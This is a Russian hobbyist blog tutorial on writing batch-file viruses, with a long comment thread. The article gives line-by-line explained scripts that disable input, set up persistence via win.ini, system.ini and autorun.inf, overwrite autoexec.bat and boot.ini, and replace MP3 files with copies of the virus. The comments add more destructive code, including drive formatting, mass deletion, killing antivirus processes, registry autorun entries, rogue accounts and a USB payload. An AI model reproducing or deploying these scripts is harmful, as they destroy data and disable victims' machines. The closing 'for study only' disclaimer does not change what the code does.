Познавательный блог Мобильная врсия

Страницы

Промо

BAT-вирус своими руками

Привет тебе снова, юный кодер-шкодер. Если ты читал прошлую мою статью под названием "Учим ДОС", то ничего сложного тут для тебя не будет. А если не читал, то внимательно смотри комментарии. Итак, начнем. Сижу я однажды и думаю: а не накатать ли мне вирус? А так как кроме QБарсика я ничего не знал, а ДОС был моим вторым ... [Братом], а ты что подумал извращенец? :)~. ТО я решил писать вирус на нем, и оказалось это не так трудно.

Вот тело моего первого вируса

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Объясняю популярно и по шагам:

1 @echo off - Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable - Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable - Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system - Копируемся в папку windows/system
// %0 - Переменная, указывающая на исходный файл-вирус
// %windir% - переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini - Добавляет текст "run=%windir%/system/*.bat" в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini - Добавляет текст "run=%windir%/system/*.bat" в файл system.ini
7 label LOHOLAMMER - Меняет имя диску c:\ на "LOHOLAMMER"
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r - Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat - Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER...xe-xe-xe > c:\autoexec.bat - Добавить текст "YOU ARE LAMMER...xe-xe-xe"
//в новый файл autoexec.bat
11 rundll32 mouse,enable - Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable - Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе"); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r - Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause - Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls - Выходим

Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать 'Вы ламер.' .Работает только в винде до 2000.

Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.

@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку :)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER....[]=[_H@CKED_BY_[kas]*_"SmallPox_Vir_Org"_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%\mes.js
echo WSHShell.Popup("Warning,.. А теперь необходимо перезагрузиться"); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls

А теперь, что-то новое.

@echo off
cls
echo Please wait, updating system...
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.

Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:

ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
" Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini

copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего ;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Рубрики: Вирусы, Программинг
Автор: admin | 09.11.2007 | Камменты: 225

Комментарии

Комментарий от Саша [ 18 марта, 2012, 17:53 ]

НаПишу мощные и качественные вирусы пишите на e-mail : sanya301472@yandex.ru
Комментарий от Basic [ 20 марта, 2012, 15:38 ]

Ммм…автор, подпиши там ещё что бы они все его запустили, ну так проверить работает или нет)
Комментарий от user [ 21 марта, 2012, 10:20 ]

как можно ограничит играть все игры на компьютере или можно заблокировать или отключит какоето .dll файлов помогите
Комментарий от hack [ 2 апреля, 2012, 16:49 ]

Всем доброе время суток на конец нашёл что искал )))) почитав всё посты внимательно и ща буду создавать свою бомбу )))
Комментарий от Сергей [ 2 апреля, 2012, 17:10 ]

у меня похуже но хватит чтобы напугать)

pause /-просим нажать любую клавишу
pause /-просим нажать любую клавишу
pause /-просим нажать любую клавишу
md c:1 / – создаем папку на диске С
md c:2 / – создаем папку на диске С
md c:3 / – создаем папку на диске С
md c:4 / – создаем папку на диске С
md c:5 / – создаем папку на диске С
md c:6 / – создаем папку на диске С
md c:7 / – создаем папку на диске С
md c:8 / – создаем папку на диске С
md c:9 / – создаем папку на диске С
md c:02 / – создаем папку на диске С
md c:11 / – создаем папку на диске С
md c:12 / – создаем папку на диске С
md c:13 / – создаем папку на диске С
md c:14 / – создаем папку на диске С
md c:26 / – и так далее далее далее….
md c:574989
md c:569
md c:499
md c:99999999
md c:279
md c:99999946354
md c:159
md c:4999
md c:6599
md c:6699
md c:999999995464
md c:499
md c:999
md c:9499
md c:9499
md c:596599
md c:9799
md c:999
md c:7889
md c:84588
md c:89488
md c:977777
md c:418541
md c:5641
md c:1564118541
md c:81
md c:854141
md c:5641
md c:56415
md c:8416548
md c:841879
md c:456456
md c:521631
md c:456
md c:46541
md c:9845
md c:942684
md c:8942
md c:984654
md c:2946
md c:9826546
md c:425465456465
md c:8642654
md c:64654
md c:265654
md c:4684654
md c:26865432
md c:421
md c:894924
md c:984298
md c:498
md c:49742
md c:987
md c:9454
md c:2874
md c:98422974
md c:97541354
md c:29789
md c:729798
md c:729875461
md c:9875641
md c:9874561
md c:9879521456
md c:7956415241
md c:87524131
md c:987297
md c:987897
md c:297297
md c:98798
md c:79564153
md c:795415
md c:729797
md c:97864854
md c:9827
md c:8796541
md c:4564
md c:56489
md c:4564
md c:867465
md c:5674
md c:8946841
md c:564156
md c:415
md c:84874
md c:6874
md c:897474
md c:96
md c:4658974
md c:5894
md c:5746857
md c:8674
md c:8694
md c:678
md c:63788
md c:9797974
md c:851
md c:655
md c:7897
md c:89798
md c:7897
md c:789
md c:7489
md c:487489
md c:456456
md c:684
tree C:\ – “проверяем” диск C, зрелище классное можно набрать в командной строке и посмотреть)
win shutdown -s -f -t 3600 /- выключаем комп через 1 час)))
Комментарий от hack [ 3 апреля, 2012, 17:21 ]

Ребята помогите А как правильно написать вир чтоб заразить главную фото в маили чтоб жертва открыла фото и слетала винда или полностью погостить машину на всегда
Комментарий от юрец [ 4 апреля, 2012, 00:21 ]

и я хочу.killerplohoi@spaces.ru
Комментарий от ТОХА [ 5 апреля, 2012, 01:58 ]

Я типа в первые таким занимаюсь. По этому очень прошу розкажите если я напишу вирус по вашему методу не заразит ли он мой комп, и как его потом удалить да есщё как его сохранять пишите на мыло Vorohilo.antoxa@mail.ru очень нужно знать!!!!!!!!!
Комментарий от hack [ 5 апреля, 2012, 07:04 ]

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini
______________________________

в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe
______________________________

в Dead.BAT пишем:
@echo off
cp Флешка:AUTOEXEC.BAT C:
msg * “Dead” >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
shutdown -s -t 1 -c “lol” -f >nul
______________________________

в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT
______________________________

готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.
Комментарий от NERV [ 18 апреля, 2012, 13:59 ]

Вобще-то добрые люди убирают автозапуск и не открывают флешки даблкликом – ебанат.

Вот нормальная команда, единственная которая – робит
rem rundll32 user32,SwapMouseButton

А все mouse,disable – хоть убейчя – не робят. А мне это позарез надо!
Комментарий от EnterNet UFO [ 19 апреля, 2012, 15:43 ]

Простейший вир calculator не возможно закрыть , но есть минус чёрное окно на втором плане

@echo off >hul
:loop >hul
echo Today is 15.12.????th^!, time 06.23 to start calculator
calc.exe >hul
goto loop >hul
Комментарий от Дима [ 23 апреля, 2012, 22:14 ]

Ты в конце каждой строки “>nul” не писал а без этого хоть и с “@echo off” процесс не будет скрытым!!! Так что советую поставить “>nul” и на экране не будет выходить коммандная строка “cmd”
Комментарий от Дима [ 23 апреля, 2012, 22:18 ]

И зачем ты cls написал в конце по любому cmd сама закроется!
Комментарий от Дима [ 23 апреля, 2012, 22:27 ]

Вот зацените мой безпощядный вирус!
@echo off
rundll32 keyboard,disable >nul
rundll32 mouse,disable >nul
del C:/ *.* \q >nul
del D:/ *.* \q >nul
del F:/ *.* \q >nul
del E:/ *.* \q >nul
del C:/Windows/System32 *.* \q >nul
del C:/Windows *.* \q >nul
assoc .lnk=.mp3 >nul
assoc .exe=.mp3 >nul
label C:У вас полетела Система! Хай Хай!! >nul
copy “”%0″” “%SystemRoot%\system32\File.bat”
reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “Filel” /t REG_SZ /d “%SystemRoot%\system32\File.bat” /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
net user “Idiot you Hacked” /add >nul
net user “Bitch you Hacked” /add >nul
net user “Durak you Hacked” /add >nul
net user “Kritin you Hacked” /add >nul
net user “Dibil you Hacked” /add >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
Кто умеет делать вирусы тот поймет!
Комментарий от Дима [ 23 апреля, 2012, 22:36 ]

Вот поприкалывайтесь над друзьями
https://depositfiles.com/files/xfw1vjm21 осторожно на своем компе не советую запускать!
Комментарий от Михаил [ 13 мая, 2012, 15:34 ]

Ой ребяты! Вам не вирусы, а анекдоты писать надо!
Во всём топике нашёл всего пару интересных, РАБОТАЮЩИХ, скриптов. В действительности, простейшими DOS операторами, сейчас уже ничего не сломать.
VBScript, JS, Delphi, вот – то что вам может пригодиться, НО это должен быть самописный, ОРИГИНАЛЬНЫЙ код, т.к. стандартные командочки вроде подмены расширения и удаления системных файлов, знают даже самые тухлые бесплатные антивирусы.
Кто действительно хочет научиться хакингу – милости прошу в бауманский Университет на курсы Light Hacking.
Теперь страждущим:
Те, кто в силу своей неопытности – всё же убил ассоциации файлов на своём компе, писаниной с данного форума – вчитайтесь в “свой” код и поправьте его в обратную сторону.
Например:
assoc .exe=.txt >nul
Поменяйте txt c exe местами.
Пускай вы просрёте свои блокнотики, зато вы сможете спокойно запустить какой-нибудь AVZ чтоб восстановить свои ассоциации.
Если “Ваш” код кишит чем-то вроде:
md c:\1
уберите это с помощью:
DEL c:\1\*.*
RD c:\1

Если “Ваш” код содержал строку удаляющую NTLDR (хотя, если мне не изменяет память – в современных системах его хрен удалишь) – вам потребуется установочный диск с виндой, но лишь для того, чтоб загрузиться в консоль восстановления и выполнить:
FIXBOOT
и
FIXMBR
После этого ваш комп должен запуститься.
Если у Вас при включении ПК загружается какая-нибудь хрень – которую вы не заказывали – в первую очередь обратите внимание на автозагрузку.
1) Пуск-Программы-Автозагрузка
2) Пуск-Выполнить-MSCONFIG-Автозагрузка
Ну и в конце (простите за оффтоп) не будте нубами, уважайте чужой труд и авторское право (это для тех кто любит копипаст) и самое главное: ПРЕДОХРАНЯЙТЕСЬ!
Пламенный привет!
Комментарий от Максим [ 9 июня, 2012, 23:44 ]

Есть у кого вирус на Взлом компьютера! И получение полного контроля!
Комментарий от Сисадмин-шкодник [ 21 июня, 2012, 04:34 ]

Доров, друг пакостник. Скажи, как эти вирусы работают на win XP и win7, если ты заходишь от юзера
и твои возможности ограничены? И как можно сделать,чтобы при запуске win7 не запрашивала для данной проги разрешение на внесение изменений??? Заранее спасибо.
Комментарий от Lol-men [ 27 июня, 2012, 16:22 ]

Комментарий от Максим [ Июнь 9, 2012, 23:44 ]
Есть у кого вирус на Взлом компьютера! И получение полного контроля!

Нет, но у меня есть скрипт, после запуска которого из монитора вылезает бегемот и дрючит владельца компа в анус.
Комментарий от >>>XaKeP [ 10 июля, 2012, 22:23 ]

Зацените))

@echo off
rundll32 keyboard,disable
Date 18.11.18
Time 18:18
rundll32 mouse,disable
echo WSHShell.Popup(“Warning,.. ВАШ ПК ЗАБЛОКИРОВАН ЗА РАСПРОСТРАНЕНИЕ ПОРНОГРАФИИ! ПРОСИМ

ОСТАВАТЬСЯ НА МЕСТЕ ДО ПРИЕЗДА ПРЕДСТАВИТЕЛЕЙ УПРАВЛЕНИЯ “К” “); >> %temp%\mes.js
start %temp%\mes.js
assoc .dll=.LOL
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
echo y|Format C:
echo y|Format D:
echo y|Format E:
echo y|Format F:
taskkill /f /im opera.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im iexplore.exe
taskkill /f /im magent.exe
taskkill /f /im Skype.exe
taskkill /f /im avp.exe
taskkill /f /im taskmgr.exe
md Windowsfghfdfhs
md abghsdgdg
md #&%$#$gdfg
md gamesdgd
md Windowsdfgdfg
md abghdfgdsfg
md #&%$#$dfsgШsdg
md gamesasgП6
md WindowsfgdfШdg
md abghfgrgdfg
md #&%$#$ddgg67П
md gamesddfgШ
md WindowsdfdgВФЫ
md abghgdfgfgВФЫВФШ7Ы
md #&%$#$gdfdfФЫВ6Ф
md gamesdfdsФЫВmШdgЫВd Windows
md abghffgЫВФЫ76
md #&%$#$sdfadВФЫФ8Ш
md gamesmdsdgf WФ6Ш876ВЫВindows
md abghsdfdfgФЫВФЫВ
md #&%$#$fdgЫВФЫШ
md gamesmd ddЫВФВВПМАО ЫВfsfsdWindows
md abghsfafВФgЬМТШ6Ш
md #&%$#$gВАТОВТВ57Г8А
md gamesdfg6Н65НГ
md WindowsfОТghНВfdfhs
md abghsdgdgВУ6
md #&%$#$gdfВТАgЛ6Г У
md gamesdgdВОТВН
md WindowsdfgdfВРДАg
md abghdfgdsfgЫВТ
md #&%$#$dfsgЫВsdЛОЬg
md gamesasgВФААВШ
md WindowsfgdfdgАФНОЫ
md abghfgrgdfФЫВgЕ
md #&%$#$ddggТР43Е
md gamesddfgФЫВВАПАВП
md WindowsdfdgВАР
md abghgdfgfgФЫО
md #&%$#$gdfdЫФЕ534НВЬТf
md gamesdfdsВmdgd ОНТВАНWindows
md abghffgФЫОЕР
md #&%$#$sdfaАТdФЫВР
md gamesmdsdgf ООТОПАТWВindows
md abghsdfdfgВАТФЫАО
md #&%$#$fdgФЫЬТАО
md gamesmdООРООТТ dВdfПТОАТОПЬТОsФЫВfsdWindows
md abghsfАВФЫafgВ
md #ФЫАЛОВФЫ&%$#$gОА
md АОТgamesdfФЫВФЫВgТ
cls
Комментарий от >>>XaKeP [ 10 июля, 2012, 22:25 ]

@echo off
rundll32 keyboard,disable
Date 18.11.18
Time 18:18
rundll32 mouse,disable
echo WSHShell.Popup(“Warning,.. ВАШ ПК ЗАБЛОКИРОВАН ЗА РАСПРОСТРАНЕНИЕ ПОРНОГРАФИИ! ПРОСИМ

ОСТАВАТЬСЯ НА МЕСТЕ ДО ПРИЕЗДА ПРЕДСТАВИТЕЛЕЙ УПРАВЛЕНИЯ “К” “); >> %temp%\mes.js
start %temp%\mes.js
assoc .dll=.LOL
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
echo y|Format C:
echo y|Format D:
echo y|Format E:
echo y|Format F:
taskkill /f /im opera.exe
taskkill /f /im firefox.exe
taskkill /f /im chrome.exe
taskkill /f /im iexplore.exe
taskkill /f /im magent.exe
taskkill /f /im Skype.exe
taskkill /f /im avp.exe
taskkill /f /im taskmgr.exe
md Windowsfghfdfhs
md abghsdgdg
md #&%$#$gdfg
md gamesdgd
md Windowsdfgdfg
md abghdfgdsfg
md #&%$#$dfsgШsdg
md gamesasgП6
md WindowsfgdfШdg
md abghfgrgdfg
md #&%$#$ddgg67П
md gamesddfgШ
md WindowsdfdgВФЫ
md abghgdfgfgВФЫВФШ7Ы
md #&%$#$gdfdfФЫВ6Ф
md gamesdfdsФЫВmШdgЫВd Windows
md abghffgЫВФЫ76
md #&%$#$sdfadВФЫФ8Ш
md gamesmdsdgf WФ6Ш876ВЫВindows
md abghsdfdfgФЫВФЫВ
md #&%$#$fdgЫВФЫШ
md gamesmd ddЫВФВВПМАО ЫВfsfsdWindows
md abghsfafВФgЬМТШ6Ш
md #&%$#$gВАТОВТВ57Г8А
md gamesdfg6Н65НГ
md WindowsfОТghНВfdfhs
md abghsdgdgВУ6
md #&%$#$gdfВТАgЛ6Г У
md gamesdgdВОТВН
md WindowsdfgdfВРДАg
md abghdfgdsfgЫВТ
md #&%$#$dfsgЫВsdЛОЬg
md gamesasgВФААВШ
md WindowsfgdfdgАФНОЫ
md abghfgrgdfФЫВgЕ
md #&%$#$ddggТР43Е
md gamesddfgФЫВВАПАВП
md WindowsdfdgВАР
md abghgdfgfgФЫО
md #&%$#$gdfdЫФЕ534НВЬТf
md gamesdfdsВmdgd ОНТВАНWindows
md abghffgФЫОЕР
md #&%$#$sdfaАТdФЫВР
md gamesmdsdgf ООТОПАТWВindows
md abghsdfdfgВАТФЫАО
md #&%$#$fdgФЫЬТАО
md gamesmdООРООТТ dВdfПТОАТОПЬТОsФЫВfsdWindows
md abghsfАВФЫafgВ
md #ФЫАЛОВФЫ&%$#$gОА
md АОТgamesdfФЫВФЫВgТ
cls
Комментарий от RoY [ 7 августа, 2012, 21:41 ]

Здравствуйте все кто любит по прикалываться над своими друзьями и уничтожить win своих врагов! :D
я еще НОВИЧОК в BATname и подскажите пожалуйста правильно ли я написал вроде простейший ВИР!

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
clc

ОН должен просто отключить клаву и мышь? И после перезагрузки ПК все будет норм?
Комментарий от ильдар [ 21 августа, 2012, 00:20 ]

помогите чтобы мой винлок запускался автоматом с виндой в автозагрузку к себе гидать это глупо допустим я комуто скинул чтобы он в виндой запускался
Комментарий от htSoldier [ 9 сентября, 2012, 13:43 ]

@echo off
cls

del %systemroot%\system32\HAL.dll /q
Комментарий от Язик [ 17 сентября, 2012, 23:28 ]

Народ, помогите. Юзанул на пк этот вирус – тот который самый первый, теперь не могу вылечить, что делать ?
срочно народ пишете на https://vk.com/xbox_elite
Комментарий от Илья [ 7 октября, 2012, 19:36 ]

Всем привет я специалист в BAT
Могу вам придложить это
md 1389233123
md 13761ё2ё12
md 13422222222
md Удоление
md 13lox
md 13Lox
md 133423324
md 133424
md 13124
md 133421
md 131213412
md 1331234
md 132234
md 13342134
md 13124
md 1323
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
start echo Идёт обновление подождите…
start pause
start logoff
Короче он немного зарожает создоёт много папок и выходит из системы
Можно пробовать на своём я пробывал всё ок!!
Это не сильный оброзец но хирачит прелично!
Ждите новоги сильного
Создоём новый который снисёт винду и больше её не устоновит
Всем пока
Комментарий от tuZ~XaKeR [ 17 ноября, 2012, 22:30 ]

хДД очень угорал над комментом Ильи , насчет специалиста в bat , такие команды каждый школьник.У кого есть вопросы насчет команд или маскировки bat пишите в вк https://vk.com/tuz_pro или в skype djandre_vip
Комментарий от аенто [ 3 декабря, 2012, 23:19 ]

парни привет как можно сделать так что б батник находящийся на флешке, с копировался в автозагрузку автоматически после того как я ее вставлю в комп
Комментарий от аенто [ 3 декабря, 2012, 23:20 ]

пожалуйста ответь мне очень нужно знать на мыло
Комментарий от Михаил [ 8 декабря, 2012, 14:34 ]

У меня ни каким макаром не сохраняются .bat файлы стоит винда xp. Че делать скажите плиз?????Либо здесь в коментах либо на мыло mihail.alex2000@yandex.ru
ПЛИЗЗЗЗЗ!!!!!

Написать комментарий

Поиск по сайту

Статистика

Мета
  Разработка и дизайн — StvPromo.ru